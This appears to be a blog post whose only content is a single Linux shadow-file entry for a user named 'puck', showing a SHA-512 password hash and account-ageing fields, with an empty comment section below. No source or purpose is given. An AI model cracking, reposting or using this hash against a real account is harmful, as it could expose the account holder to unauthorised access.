puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::





No comments:

Post a Comment